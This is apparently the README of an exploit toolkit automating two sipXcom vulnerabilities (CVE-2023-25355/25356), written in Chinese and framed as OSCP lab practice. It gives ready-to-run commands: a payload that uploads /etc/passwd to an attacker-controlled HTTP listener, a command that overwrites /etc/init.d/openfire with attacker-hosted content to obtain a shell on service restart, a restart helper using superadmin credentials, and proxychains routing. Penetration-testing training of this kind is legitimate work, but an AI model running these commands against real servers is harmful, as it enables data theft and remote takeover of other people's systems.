该漏洞由 [email protected] 发现,并以两篇精彩文章呈现:
Alex Linov 发布了一个仓库,用于进一步自动化此漏洞:
CVE-2023-25355 是一种数据外泄机制,攻击者将 sipXcom 服务器上的文件上传到其控制的 Web 服务器。
CVE-2023-25356 是第一个漏洞的扩展,攻击者可以将自己控制的文件写入 sipXcom 服务器的文件系统。 由于 sipXcom 服务能够覆盖自身的 init 配置,因此一旦服务重启,即可轻松获取 shell。
这里值得注意的是,sipXcom 的超级管理员用户可以重启该服务。 因此,本工具包的目的就是完全自动化该服务的重启过程。
在准备 OSCP 时,有些实验环境包含需要攻破的机器。
在某个特定的实验环境中,存在此漏洞的机器相当不稳定,这意味着你有时需要多次启动和回滚实验环境。 这很烦人。一旦自动化,就没那么烦人了。
你需要:
poetry install
然后,你可以从激活的环境运行该工具,从当前目录运行,或者从其他目录使用 CVE 名称运行:
# 如果 poetry 环境已激活 (poetry shell)
cve_2023_25355 --help
# 否则,从当前目录
poetry run cve_2023_25355 --help
# 否则,从其他目录
poetry -C /shared/tools/CVE/CVE-2023-25355 run cve_2023_25355 --help
在以下示例中,我们发送一个 payload 来外泄 /etc/passwd 文件,该文件将被上传到攻击者控制的 HTTP 监听器。
cve_2023_25355 \
--xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
--xmpp-server-address 1.2.3.4 \
--payload '--data-binary @/etc/passwd http://ATTACKER-WEB-LISTENER/some_path'
在以下示例中,我们发送一个 payload,用提供的 URI 内容覆盖 /etc/init.d/openfire。
cve_2023_25356 \
--xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
--xmpp-server-address 1.2.3.4 \
--sipxcom-init-file-source-uri 'http://ATTACKER-WEB-LISTENER/my-offensive-sipx-config'
然后,如果我们知道超级管理员密码,可以重启服务以重新加载配置并触发任意 gadget。
run sipxcom_service_restart \
--sipxcom-superuser-username superadmin \
--sipxcom-superuser-password superadmin_password \
--sipxcom-website https://1.2.3.4/
--debug-local-directory /tmp
./proxychains4 -f proxychains.conf cve_2023_25355 [...] --xmpp-server-address 172.1.2.3
项目: